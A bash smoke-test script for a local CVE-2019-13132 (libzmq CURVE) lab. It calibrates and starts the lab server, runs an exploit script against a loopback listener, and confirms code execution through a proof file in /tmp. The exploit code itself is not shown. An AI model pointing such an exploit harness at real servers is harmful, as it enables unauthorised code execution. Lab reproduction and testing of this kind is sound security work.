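#!/bin/bash
# End-to-end smoke test for CVE-2019-13132 lab.
#
# Flow: make sure the lab server has a calibration profile and is running,
# run the exploit against the loopback listener (127.0.0.1:5556), then check
# that the proof file appeared. The server is restarted at the end so the lab
# can be re-used.
#
# Environment:
#   LAB_ROOT  lab install directory (default: /opt/zmq-curve-rce)
#
# Exit status: 0 when the proof file was created, non-zero otherwise.
set -euo pipefail

readonly ROOT=${LAB_ROOT:-/opt/zmq-curve-rce}
# Fixed, predictable path in /tmp; presumably the one exploit.py's payload
# writes -- confirm against exploit.py before changing it.
readonly PROOF=/tmp/pwned-13132

# Print the tail of the server log, if there is one, to help explain a failure.
dump_server_log() {
  echo " server log:"
  tail -20 "$ROOT/srv.log" 2>/dev/null || true
}

cd -- "$(dirname -- "$0")"
echo "=== CVE-2019-13132 lab test ==="

# 1. ensure server + calibration
if [ ! -f "$ROOT/profile.json" ]; then
  echo "[*] no profile.json — running calibration first"
  # "$ROOT" is quoted everywhere so a LAB_ROOT containing spaces or glob
  # characters is not word-split into a different command line.
  "$ROOT/start_server.sh"
  sleep 1
  "$ROOT/calibrate.sh"
  # restart server (GDB detach may leave it in odd state)
  "$ROOT/start_server.sh"
  sleep 1
fi

# make sure server is running
if ! pgrep -x server-curve >/dev/null 2>&1; then
  "$ROOT/start_server.sh"
  sleep 1
fi

# 2. run exploit — system() proof
# Remove any stale proof first so a leftover from an earlier run cannot
# produce a false PASS.
rm -f -- "$PROOF"

# Capture the status instead of letting `set -e` abort here: a failing run
# should still report [FAIL] together with the server log.
exploit_rc=0
python3 "$ROOT/exploit.py" 127.0.0.1 5556 || exploit_rc=$?
if [ "$exploit_rc" -ne 0 ]; then
  echo "[FAIL] exploit.py exited with status $exploit_rc."
  dump_server_log
  exit 1
fi
sleep 2

# The proof path is predictable and /tmp is shared, so do not follow a
# symlink that something else placed there: `cat` would print its target.
if [ -L "$PROOF" ]; then
  echo "[FAIL] $PROOF is a symlink — refusing to read it."
  exit 1
fi

if [ -f "$PROOF" ]; then
  echo ""
  echo "--- proof file contents ---"
  cat -- "$PROOF"
  echo "--- end ---"
  echo ""
  echo "[PASS] RCE confirmed — $PROOF created by the libzmq server process."
else
  echo "[FAIL] $PROOF was not created."
  dump_server_log
  exit 1
fi

# 3. restart server for re-use (exploit kills the process via exit_group)
# Output is discarded, so report a failed restart explicitly rather than
# exiting silently under `set -e`.
if ! "$ROOT/start_server.sh" >/dev/null 2>&1; then
  echo "[FAIL] could not restart the server after the run." >&2
  exit 1
fi
echo "[PASS] CVE-2019-13132 lab — RCE chain verified end-to-end."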